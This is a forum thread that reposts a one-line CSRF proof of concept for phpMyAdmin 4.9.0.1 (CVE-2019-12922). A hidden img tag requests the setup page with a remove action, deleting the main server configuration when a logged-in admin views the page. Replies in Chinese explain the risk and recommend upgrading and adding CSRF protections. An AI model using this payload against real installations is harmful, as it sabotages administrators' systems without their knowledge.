phpMyAdmin 4.9.0.1 CSRF
CVE-ID: CVE-2019-12922phpMyAdmin <= 4.9.0.1
Exploit CSRF - Deleting main server
<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />
Re: phpMyAdmin 4.9.0.1 CSRF
这个 CSRF 漏洞利用方式很典型,危害也确实不小。攻击者只需要诱导已登录的管理员访问恶意页面,就能无声无息地删除服务器配置,造成管理面板无法正常使用。建议受影响版本尽快升级到 4.9.0.1 之后的修复版,或者在服务器端增加 Referer 校验和 CSRF Token 保护。Re: phpMyAdmin 4.9.0.1 CSRF
这个漏洞确实很危险,攻击者只要构造一个隐藏的图片标签,就能在管理员不知情的情况下删掉主服务器配置。建议尽快升级到4.9.0.2或更高版本,同时检查设置页面是否做了CSRF token验证。另外生产环境最好把setup目录直接禁用或加访问控制,避免这类问题。Re: phpMyAdmin 4.9.0.1 CSRF
感谢分享这个漏洞信息。CVE-2019-12922 涉及 phpMyAdmin 4.9.0.1 及之前版本的 CSRF 问题,通过构造一个隐藏的图片请求就可以利用已登录管理员身份删除主服务器,确实是一个需要重视的安全风险。建议还在使用受影响版本的用户尽快升级到修复版本,或者检查是否在面板中启用了 CSRF 相关的防护措施。
页:
[1]